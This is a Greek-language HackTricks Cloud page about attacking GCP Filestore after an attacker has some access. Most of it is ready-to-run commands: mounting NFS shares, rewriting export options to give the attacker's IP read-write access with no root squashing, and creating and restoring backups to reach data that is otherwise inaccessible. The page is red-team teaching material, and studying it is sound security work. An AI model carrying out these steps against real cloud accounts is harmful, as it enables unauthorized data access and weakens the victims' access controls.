Μάθετε το χάκινγκ του AWS από το μηδέν μέχρι τον ήρωα με το htARTE (HackTricks AWS Red Team Expert)!
Άλλοι τρόποι για να υποστηρίξετε το HackTricks:
- Εάν θέλετε να δείτε την εταιρεία σας να διαφημίζεται στο HackTricks ή να κατεβάσετε το HackTricks σε μορφή PDF ελέγξτε τα ΣΧΕΔΙΑ ΣΥΝΔΡΟΜΗΣ!
- Αποκτήστε το επίσημο PEASS & HackTricks swag
- Ανακαλύψτε την Οικογένεια PEASS, τη συλλογή μας από αποκλειστικά NFTs
- Εγγραφείτε στην 💬 ομάδα Discord ή στην ομάδα telegram ή ακολουθήστε μας στο Twitter 🐦 @hacktricks_live.
- Μοιραστείτε τα χάκινγκ κόλπα σας υποβάλλοντας PRs στα HackTricks και HackTricks Cloud αποθετήρια του github.
Για περισσότερες πληροφορίες σχετικά με το Filestore, ελέγξτε:
{% content-ref url="../gcp-services/gcp-filestore-enum.md" %} gcp-filestore-enum.md {% endcontent-ref %}
Ένα κοινόχρηστο αρχείοσυστημα μπορεί να περιέχει ευαίσθητες πληροφορίες που ενδιαφέρουν από την άποψη ενός επιτιθέμενου. Με πρόσβαση στο Filestore είναι δυνατή η τοποθέτησή του:
{% code overflow="wrap" %}
sudo apt-get update
sudo apt-get install nfs-common
# Check the share name
showmount -e <IP>
# Mount the share
mkdir /mnt/fs
sudo mount [FILESTORE_IP]:/[FILE_SHARE_NAME] /mnt/fs
{% endcode %}
Για να βρείτε τη διεύθυνση IP ενός αρχείου αποθήκευσης, ελέγξτε την ενότητα απαρίθμησης της σελίδας:
{% content-ref url="../gcp-services/gcp-filestore-enum.md" %} gcp-filestore-enum.md {% endcontent-ref %}
Αν ο επιτιθέμενος δεν έχει πρόσβαση από μια διεύθυνση IP στον κοινόχρηστο χώρο, αλλά έχετε αρκετά δικαιώματα για να το τροποποιήσετε, είναι δυνατόν να αφαιρέσετε τους περιορισμούς ή να αποκτήσετε πρόσβαση σε αυτό. Είναι επίσης δυνατόν να χορηγήσετε περισσότερα προνόμια στη διεύθυνση IP σας για να έχετε διαχειριστική πρόσβαση στον κοινόχρηστο χώρο:
gcloud filestore instances update nfstest \
--zone=<exact-zone> \
--flags-file=nfs.json
# Contents of nfs.json
{
"--file-share":
{
"capacity": "1024",
"name": "<share-name>",
"nfs-export-options": [
{
"access-mode": "READ_WRITE",
"ip-ranges": [
"<your-ip-private-address>/32"
],
"squash-mode": "NO_ROOT_SQUASH",
"anon_uid": 1003,
"anon_gid": 1003
}
]
}
}
Εάν υπάρχει ένα αντίγραφο ασφαλείας, είναι δυνατόν να το αποκαταστήσετε σε μια υπάρχουσα ή σε μια νέα περίπτωση, έτσι ώστε οι πληροφορίες να γίνουν προσβάσιμες:
# Create a new filestore if you don't want to modify the old one
gcloud filestore instances create <new-instance-name> \
--zone=<zone> \
--tier=STANDARD \
--file-share=name=vol1,capacity=1TB \
--network=name=default,reserved-ip-range=10.0.0.0/29
# Restore a backups in a new instance
gcloud filestore instances restore <new-instance-name> \
--zone=<zone> \
--file-share=<instance-file-share-name> \
--source-backup=<backup-name> \
--source-backup-region=<backup-region>
# Follow the previous section commands to mount it
Εάν δεν έχετε πρόσβαση σε ένα κοινόχρηστο φάκελο και δεν θέλετε να τον τροποποιήσετε, είναι δυνατόν να δημιουργήσετε ένα αντίγραφο ασφαλείας του και να το αποκαταστήσετε όπως αναφέρθηκε προηγουμένως:
{% code overflow="wrap" %}
# Create share backup
gcloud filestore backups create <back-name> \
--region=<region> \
--instance=<instance-name> \
--instance-zone=<instance-zone> \
--file-share=<share-name>
# Follow the previous section commands to restore it and mount it
{% endcode %}
Μάθετε το hacking του AWS από το μηδέν μέχρι τον ήρωα με το htARTE (HackTricks AWS Red Team Expert)!
Άλλοι τρόποι για να υποστηρίξετε το HackTricks:
- Εάν θέλετε να δείτε την εταιρεία σας να διαφημίζεται στο HackTricks ή να κατεβάσετε το HackTricks σε μορφή PDF ελέγξτε τα ΣΧΕΔΙΑ ΣΥΝΔΡΟΜΗΣ!
- Αποκτήστε το επίσημο PEASS & HackTricks swag
- Ανακαλύψτε την Οικογένεια PEASS, τη συλλογή μας από αποκλειστικά NFTs
- Εγγραφείτε στη 💬 ομάδα Discord ή στη ομάδα telegram ή ακολουθήστε μας στο Twitter 🐦 @hacktricks_live.
- Μοιραστείτε τα κόλπα σας για το hacking υποβάλλοντας PRs στα HackTricks και HackTricks Cloud αποθετήρια του github.